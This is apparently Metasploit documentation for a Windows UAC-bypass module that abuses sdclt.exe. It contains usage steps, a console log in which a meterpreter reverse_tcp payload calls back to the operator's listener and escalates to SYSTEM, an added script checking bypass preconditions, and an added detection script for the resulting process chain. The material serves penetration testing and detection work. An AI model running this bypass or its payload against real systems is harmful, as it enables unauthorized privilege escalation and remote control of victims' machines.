GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/local/bypassuac_sdclt.md

Introduction

This module abuses sdclt.exe, the Windows Backup and Restore binary, which is marked auto-elevate and therefore runs as a high-integrity process without a UAC prompt when started by a member of the local Administrators group. From the unprivileged session the module writes a command into the registry (the reg_command value in the log below, a cmd.exe /c start of the uploaded payload), launches sdclt.exe so that the command executes in the elevated context, and reverts its registry changes once the new session arrives. Before doing anything it checks that the session user is in the Administrators group and that UAC is at a level it can bypass: with UAC disabled there is nothing to bypass, and at the strictest setting (Always Notify) auto-elevating binaries still prompt. The uploaded payload binary is not removed by the module and must be cleaned up by hand.

Usage

  1. Create a session on the target system in the context of a user who is a member of the local Administrators group (a medium-integrity, UAC-filtered token is the expected starting point).

  2. Begin interacting with the module: use exploit/windows/local/bypassuac_sdclt.

  3. Set the PAYLOAD and configure it correctly (for a reverse payload, LHOST and LPORT). PAYLOAD_NAME may be set to control the filename of the uploaded binary; by default a random name is used.

  4. If an existing handler is already configured to receive the elevated session, disable the module's own handler: set DisablePayloadHandler true.

  5. Make sure that the SESSION value is set to the existing session identifier.

  6. Invoke the module: run.

  7. Once the elevated session is open, delete the payload binary the module reported uploading to the user's temp directory. The module reverts its registry changes itself but, as its own warning states, does not remove the file.
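The module's pre-flight checks (administrators-group membership and a bypassable UAC level) decide whether step 6 is worth running at all. The script below is an added example, not code from the Metasploit module or its documentation; it reproduces those checks from a plain shell on the target so the answer is known before a payload is uploaded. Assumptions, labelled in the comments: the registry value names and the meaning of their numeric settings follow the documented UAC policy under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System; the labels are the UAC slider names, of which the module's own output on this page shows only "Default"; the admin check parses `whoami /groups` for the well-known Administrators SID.

```python
"""Added example: reproduce the preconditions bypassuac_sdclt checks before it
acts. The classification and group-parsing logic is pure so it can be tested
anywhere; the live readers only work on Windows.

Assumption: value names/semantics are from the documented UAC policy key, and
the labels follow the UAC slider (the module's log here shows only "Default").
"""
import subprocess
import sys

# Assumed policy location (documented UAC policy key, not taken from the module).
UAC_POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators


def classify_uac(enable_lua, consent_admin, secure_desktop):
    """Map EnableLUA, ConsentPromptBehaviorAdmin and PromptOnSecureDesktop to a
    slider label and whether an auto-elevate bypass such as sdclt can proceed.

    Returns (label, continue_bypass).
    """
    if enable_lua == 0:
        # No UAC: an admin's logon token is already unfiltered, nothing to bypass.
        return ("Disabled", False)
    if consent_admin in (1, 2):
        # Always Notify: auto-elevating binaries prompt as well, so the bypass fails.
        return ("Always Notify", False)
    if consent_admin == 0:
        return ("Never Notify", True)
    if consent_admin == 5:
        label = "Default" if secure_desktop == 1 else "Default (no secure desktop)"
        return (label, True)
    # 3 and 4: prompt on the normal desktop; auto-elevate still skips the prompt.
    return ("Prompt on normal desktop", True)


def is_local_admin_from_groups(whoami_groups_output):
    """True if the Administrators SID appears in `whoami /groups` output.

    A medium-integrity (filtered) admin token still lists the group, marked
    "Group used for deny only"; that is exactly the token a UAC bypass starts from.
    """
    return ADMINISTRATORS_SID in whoami_groups_output


def read_uac_policy():
    """Read the live policy values on Windows; elsewhere raise so callers notice."""
    if sys.platform != "win32":
        raise OSError("UAC policy only exists on Windows")
    import winreg  # only importable on Windows
    values = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UAC_POLICY_KEY) as key:
        for name in ("EnableLUA", "ConsentPromptBehaviorAdmin", "PromptOnSecureDesktop"):
            values[name] = winreg.QueryValueEx(key, name)[0]
    return values


def check_preconditions():
    """Mirror the module's pre-flight: group membership plus a bypassable UAC level."""
    groups = subprocess.run(["whoami", "/groups"], capture_output=True, text=True).stdout
    policy = read_uac_policy()
    label, ok = classify_uac(policy["EnableLUA"],
                             policy["ConsentPromptBehaviorAdmin"],
                             policy["PromptOnSecureDesktop"])
    admin = is_local_admin_from_groups(groups)
    return {"admin": admin, "uac_level": label, "bypassable": admin and ok}


if __name__ == "__main__":
    print(check_preconditions())
```

Run it from the session's shell on the target; a result with "bypassable": True corresponds to the log lines "Part of Administrators group!" and "BypassUAC can bypass this setting" that the module prints before uploading anything.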

Scenarios

Windows 10.0.17134 x64

```
msf5 exploit(windows/local/bypassuac_sdclt) > show options

Module options (exploit/windows/local/bypassuac_sdclt):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION       1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf5 exploit(windows/local/bypassuac_sdclt) > run

[*] Started reverse TCP handler on 192.168.135.168:4444
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] exploit_file = C:\Windows\System32\sdclt.exe
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
[*] Making Payload
[*] reg_command = C:\Windows\System32\cmd.exe /c start C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\sdclt.exe
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49679) at 2019-10-25 14:55:08 -0500
[*] Removing Registry Changes
[*] Registry Changes Removed
meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
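The log above leaves a clear process-lineage trail: the auto-elevated sdclt.exe spawns cmd.exe with the planted "/c start" command, and that cmd.exe starts a binary out of the user's AppData\Local\Temp at high integrity. The following is an added example, not code from the Metasploit module or its documentation, showing detection logic over process-creation events for exactly that trail. The sample records are constructed here in a Sysmon Event ID 1 style (Image, ParentImage, CommandLine and IntegrityLevel are Sysmon's field names); the command lines of the suspicious records are copied from the log, and the benign records are invented for contrast.

```python
"""Added example: flag the process chain the bypassuac_sdclt log shows.
Events are constructed in a Sysmon Event ID 1 style; nothing here reads a
real event log.
"""
import re

# Children of sdclt.exe that have no business being a shell (assumed list).
HIGH_RISK_CHILDREN = {"cmd.exe", "powershell.exe"}
# The user-writable location the module's payload lands in (from tmp_dir in the log).
USER_WRITABLE = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (severity, reason) for a suspicious event, else None."""
    parent = basename(ev.get("ParentImage", ""))
    child = basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    integrity = ev.get("IntegrityLevel", "").lower()

    # Rule 1: the auto-elevated backup binary handing control to a shell.
    # This is the module's reg_command: cmd.exe /c start <payload>.
    if parent == "sdclt.exe" and child in HIGH_RISK_CHILDREN:
        return ("high", "sdclt.exe spawned %s: %s" % (child, cmdline))

    # Rule 2: anything running elevated out of a user-writable temp directory.
    # Generic, so medium: catches the payload regardless of which auto-elevate
    # binary launched it.
    if integrity == "high" and USER_WRITABLE.search(ev.get("Image", "")):
        return ("medium", "high-integrity process from temp path: %s" % ev["Image"])
    return None


def detect(events):
    """Return (index, severity, reason) for every suspicious event, in order."""
    hits = []
    for i, ev in enumerate(events):
        verdict = score_event(ev)
        if verdict:
            hits.append((i, verdict[0], verdict[1]))
    return hits


SAMPLE_EVENTS = [
    # constructed, benign: interactive launch at medium integrity
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe", "IntegrityLevel": "Medium"},
    # constructed: sdclt.exe itself auto-elevating; on its own this is normal
    {"Image": r"C:\Windows\System32\sdclt.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "sdclt.exe", "IntegrityLevel": "High"},
    # command line from the log: the planted command run by elevated sdclt.exe
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\sdclt.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c start C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe",
     "IntegrityLevel": "High"},
    # path from the log: the payload started by that cmd.exe
    {"Image": r"C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe",
     "IntegrityLevel": "High"},
]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Rule 1 fires on the cmd.exe record and rule 2 on the payload record; the sdclt.exe launch alone is not flagged, because auto-elevation of a signed Windows binary is ordinary and the signal is what it spawns and where that child lives.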